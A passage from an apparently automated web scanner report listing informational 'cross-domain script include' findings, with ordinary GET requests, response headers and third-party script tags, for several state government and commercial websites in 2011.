src="http://static.mogulus.com/scripts/playerv2.js?channel=nysenate&amp;layout=playerEmbedDefault&amp;backgroundColor=0xffffff&amp;backgroundAlpha=1&amp;backgroundGradientStrength=0&amp;chromeColor=0x000000&amp;headerBarGlossEnabled=true&amp;controlBarGlossEnabled=true&amp;chatInputGlossEnabled=false&amp;uiWhite=true&amp;uiAlpha=0.5&amp;uiSelectedAlpha=1&amp;dropShadowEnabled=true&amp;dropShadowHorizontalDistance=10&amp;dropShadowVerticalDistance=10&amp;paddingLeft=0&amp;paddingRight=0&amp;paddingTop=0&amp;paddingBottom=0&amp;cornerRadius=3&amp;backToDirectoryURL=null&amp;bannerURL=null&amp;bannerText=null&amp;bannerWidth=320&amp;bannerHeight=50&amp;showViewers=true&amp;embedEnabled=true&amp;chatEnabled=false&amp;onDemandEnabled=true&amp;programGuideEnabled=false&amp;fullScreenEnabled=true&amp;reportAbuseEnabled=false&amp;gridEnabled=false&amp;initialIsOn=false&amp;initialIsMute=false&amp;initialVolume=10&amp;contentId=null&amp;initThumbUrl=null&amp;playeraspectwidth=4&amp;playeraspectheight=3&amp;mogulusLogoEnabled=false&amp;width=270&amp;height=211&amp;wmode=window" type="text/javascript"></script>
...[SNIP]...

20.149. http://www.nysenate.gov/calendar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nysenate.gov
Path:   /calendar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /calendar HTTP/1.1
Host: www.nysenate.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=127183506.1304117463.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=127183506.1473111706.1304117463.1304117463.1304117463.1; _percent_mobile_c=6858571226938101_1304121058139_3326642873665821; __utmc=127183506; __utmb=127183506.1.10.1304117463;

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1304166742"
Last-Modified: Sat, 30 Apr 2011 12:32:22 GMT
X-AH-Environment: prod
Content-Length: 125149
Date: Sat, 30 Apr 2011 12:39:51 GMT
X-Varnish: 2298119929 2298078236
Age: 447
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

20.150. http://www.odh.ohio.gov/forms/formfinder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.odh.ohio.gov
Path:   /forms/formfinder.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forms/formfinder.aspx HTTP/1.1
Host: www.odh.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 70709
Date: Sat, 30 Apr 2011 12:39:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.151. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:09 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=vg3vmlsoshfa39r3kb5kj5jrq0; expires=Mon, 23-May-2011 00:52:29 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 29 Apr 2011 21:17:31 GMT
ETag: "4bacb78b273b8f8819eb563a375e8dce"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.152. http://www.osc.state.ny.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.osc.state.ny.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.osc.state.ny.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 22865
Content-Type: text/html
Content-Location: http://www.osc.state.ny.us/index.htm
Last-Modified: Thu, 28 Apr 2011 16:51:40 GMT
Accept-Ranges: bytes
ETag: "31eb78bc45cc1:15f5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:50:21 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js"></script>
...[SNIP]...

20.153. https://www.paybill.com/Common/Left.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paybill.com
Path:   /Common/Left.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Common/Left.asp?ID=205 HTTP/1.1
Host: www.paybill.com
Connection: keep-alive
Referer: https://www.paybill.com/payccu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:54:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 1594
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:53:43 GMT
Cache-control: no-cache


<HTML>
<HEAD>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
</HEAD>
</HTML>


<HTML>
<HEAD>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">

...[SNIP]...
<td width="135" align="center" valign="top"><script src=https://seal.verisign.com/getseal?host_name=www.paybill.com&size=M&use_flash=NO&use_transparent=NO&lang=en></script>
...[SNIP]...

20.154. http://www.qualityinfo.org/olmisj/OlmisZine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qualityinfo.org
Path:   /olmisj/OlmisZine

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /olmisj/OlmisZine HTTP/1.1
Host: www.qualityinfo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=F497D08E36FD5F67806540814E0ECF4D; Path=/olmisj
Vary: Accept-Encoding
Connection: close
Content-Length: 28792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /
...[SNIP]...
<!-- end div content -->


<script src="http://www.google-analytics.com/ga.js" type="text/javascript">
</script>
...[SNIP]...

20.155. http://www.real.com/realplayer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.real.com
Path:   /realplayer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /realplayer HTTP/1.1
Host: www.real.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: JSESSIONID=BD5220AADC49692F465066534E191CF4; Path=/realcom
Set-Cookie: rntrack=src=realplayer&opage=realplayer; Domain=.real.com; Expires=Sat, 30 Apr 2011 13:10:04 GMT; Path=/;
Set-Cookie: rnseo=; Domain=.real.com; Path=/;
Set-Cookie: NSC_Sfbmdpn-bqq.sfbm.dpn-80=ffffffffaf16e47045525d5f4f58455e445a4a4229a0;expires=Sat, 30-Apr-2011 14:04:18 GMT;path=/;httponly
Connection: close
Content-Length: 26892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...
<link type="text/css" media="screen" href="http://static.realone.com/realcom/css/realcom.base.css?bid=1304118049486" rel="stylesheet" /><script src="http://static.realone.com/realcom/js/jquery-1.3.2.min.js?bid=1304118049486" type="text/javascript"></script><script src="http://static.realone.com/realcom/js/global.js?bid=1304118049486" type="text/javascript"></script>
...[SNIP]...
</style>
       <script src="http://static.realone.com/realcom/js/mbox_ss.js?bid=1304118049486" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://static.realone.com/realcom/js/navbar.js?bid=1304118049486" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script><script src="http://static.realone.com/realcom/js/s_code.js?bid=1304118049486" type="text/javascript"></script>
...[SNIP]...

20.156. https://www.scsignon.sc.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:07 GMT
Connection: close
Content-Length: 38680
Set-Cookie: TS958e6e=b2ae68f55edcc23ee94ce2114343a9488f3c5cdacd73a69a4dbc0327; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           Login
       </title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       
...[SNIP]...
HBsaWNhdGlvblNJZD1TQ0JPUxYCHwAFH3Nob3dSZXRyaWV2ZURpdihkb2N1bWVudCx0cnVlKTtkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQhidG5Mb2dpbgURYnRuQ2hhbmdlUGFzc3dvcmTOPTg8RwhmgA+fzEprzVs8anZdRw==" />


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.157. https://www.scsignon.sc.gov/Common/HelpWindow.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Common/HelpWindow.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Common/HelpWindow.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:07 GMT
Connection: close
Set-Cookie: TS958e6e=dfdcf9946f9839514d16f4e3c29e87328f3c5cdacd73a69a4dbc0328; Path=/
Vary: Accept-Encoding
Content-Length: 32551


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Welcome to the South Carolina Business One Stop
       </title>
       <meta http-equiv="Con
...[SNIP]...
UkuUGFnZS5Qcm9jZXNzUmVxdWVzdE1haW4oQm9vbGVhbiBpbmNsdWRlU3RhZ2VzQmVmb3JlQXN5bmNQb2ludCwgQm9vbGVhbiBpbmNsdWRlU3RhZ2VzQWZ0ZXJBc3luY1BvaW50KQ0KDQoNCh4HVmlzaWJsZWhkZGSB7lByQ3SoMSSJ7spbQUtrsroE4Q==" />


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.158. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Eng/Secured/Security/ForgotPassword.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Eng/Secured/Security/ForgotPassword.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:11 GMT
Connection: close
Content-Length: 35565
Set-Cookie: TS958e6e=03bbad503533905e4d507c70b83d12198f3c5cdacd73a69a4dbc032c; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS Forgot Password - Enter User
Name
       </title>
       <meta http-equiv="Content-Type" con
...[SNIP]...
gIHDw9kFgIeB29uY2xpY2sFOmlmKFBhZ2VfQ2xpZW50VmFsaWRhdGUoKSl7c2hvd1JldHJpZXZlRGl2KGRvY3VtZW50LHRydWUpO31kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQdidG5OZXh0mSSY2Wjhg+wSuJHOD580pDuPi4Y=" />


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.159. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Eng/Secured/Security/ForgotUserName.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Eng/Secured/Security/ForgotUserName.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:14 GMT
Connection: close
Content-Length: 35777
Set-Cookie: TS958e6e=aed2e7cc2d346bc41b1ac340bfeac58f8f3c5cdacd73a69a4dbc032e; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Forgot
User Name
       </title>
       <meta http-equiv="Content-Type" content="text/html
...[SNIP]...
gICBw8PZBYCHgdvbmNsaWNrBTppZihQYWdlX0NsaWVudFZhbGlkYXRlKCkpe3Nob3dSZXRyaWV2ZURpdihkb2N1bWVudCx0cnVlKTt9ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUHYnRuTmV4dC4mOMW9nmnhxvVPVdhN6ONEYYKy" />


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.160. https://www.scsignon.sc.gov/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Login.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:13 GMT
Connection: close
Content-Length: 38680
Set-Cookie: TS958e6e=aed2e7cc2d346bc41b1ac340bfeac58f8f3c5cdacd73a69a4dbc032e; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           Login
       </title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       
...[SNIP]...
HBsaWNhdGlvblNJZD1TQ0JPUxYCHwAFH3Nob3dSZXRyaWV2ZURpdihkb2N1bWVudCx0cnVlKTtkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQhidG5Mb2dpbgURYnRuQ2hhbmdlUGFzc3dvcmTOPTg8RwhmgA+fzEprzVs8anZdRw==" />


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.161. https://www.scsignon.sc.gov/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:20 GMT
Connection: close
Set-Cookie: TS958e6e=274ee5e0c50b7433045d42ee8c81d6e48f3c5cdacd73a69a4dbc0335; Path=/
Vary: Accept-Encoding
Content-Length: 32144


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Welcome to the South Carolina Business One Stop
       </title>
       <meta http-equiv="Con
...[SNIP]...
XRlKCkNCiAgIGF0IFN5c3RlbS5XZWIuSHR0cEFwcGxpY2F0aW9uLkV4ZWN1dGVTdGVwKElFeGVjdXRpb25TdGVwIHN0ZXAsIEJvb2xlYW4mIGNvbXBsZXRlZFN5bmNocm9ub3VzbHkpDQoNCg0KHgdWaXNpYmxlaGRkZC98rnkvMO4H4C7aoPwpbAVIScWO" />


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.162. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /eng/Secured/Security/CreateUserName.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /eng/Secured/Security/CreateUserName.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:08 GMT
Connection: close
Content-Length: 35575
Set-Cookie: TS958e6e=226dae4efe979dc85adeff56f4125f3a8f3c5cdacd73a69a4dbc0329; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS Register User - Create User Name
       </title>
       <meta http-equiv="Content-Type" conten
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMzg4MDgzOTg4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJYnRuU3VibWl0KobLXhVujQREFd8JOcW/WwZ+I6c=" />


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.163. http://www.servicelocator.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.servicelocator.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.servicelocator.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID CURa ADMa DEVa TAIa PSAa PSDa OUR IND COM NAV INT CNT PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33754
Connection: close
Via: 1.1 AN-0003011043770144


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js?pub=ellisoli"></script>
...[SNIP]...

20.164. http://www.sha.maryland.gov/Index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sha.maryland.gov
Path:   /Index.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Index.aspx HTTP/1.1
Host: www.sha.maryland.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 193368
Content-Type: text/html; charset=utf-8
Expires: Fri, 15 Apr 2011 12:44:15 GMT
Last-Modified: Sat, 30 Apr 2011 12:44:15 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rqeiycuw31xd1priax01f155; path=/; HttpOnly
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Sat, 30 Apr 2011 12:44:14 GMT
Connection: close


<!--DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"-->
<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

20.165. http://www.state.mn.us/portal/mn/jsp/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/home.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/mn/jsp/home.do?agency=NorthStar HTTP/1.1
Host: www.state.mn.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:21 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadeldidhfggcfjkcenndfjgdgom.0:@@@@1803480290.1304161941@@@@; path=/portal
